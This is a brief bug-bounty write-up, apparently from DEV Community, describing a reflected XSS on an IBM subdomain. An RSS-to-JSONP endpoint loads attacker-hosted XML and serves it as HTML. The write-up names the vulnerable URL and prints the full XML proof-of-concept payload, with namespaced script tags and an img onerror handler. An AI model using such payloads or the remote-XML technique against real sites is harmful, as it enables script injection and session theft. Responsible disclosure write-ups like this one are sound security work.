Reflected XSS by jsonp on ibm.com subdomain

#security #jsonp #xss #bugbounty

hi :D
this my write up about my bug I've found on ibm.com, first I get URLs from web.archive.org on ibm.com by using waybackurls tool and I got this URL https://www-356.ibm.com/partnerworld/wps/servlet/pwdyn/pw/rss/rsstojson.jsp?ccdb=no&rssurl=https://www-2000.ibm.com/file.xml&_=1596170198353
this endpoint include XML file via rssurl parameter and covert the content from XML to jsonp

but in headers, content-type: text/html, this allowed to execute HTML tags in this page , so I've created an XML file with XSS payload and upload it on my website https://knassar702.github.io/xss.xml
and add the link of the file in rssurl parameter

<html>
        <head></head>
        <body>
                <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
                <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
                <info>
                  <name>
                    <value><![CDATA[<img src=x onerror=confirm(document.domain)>]]></value>
                  </name>
                    <description>
                      <value>Hello</value>
                    </description>
                    <url>
                      <value>http://google.com</value>
                    </url>
                </info>
        </body>
</html>

Done :D

DEV Community

Reflected XSS by jsonp on ibm.com subdomain

Top comments (0)

Read next

Are hackers watching your screen right now?

The good, the bad and the ugly of the XZ vulnerability (CVE 2024-3094)

Protect API Gateway with Amazon Verified Permissions

Backdoor trap security in place yet?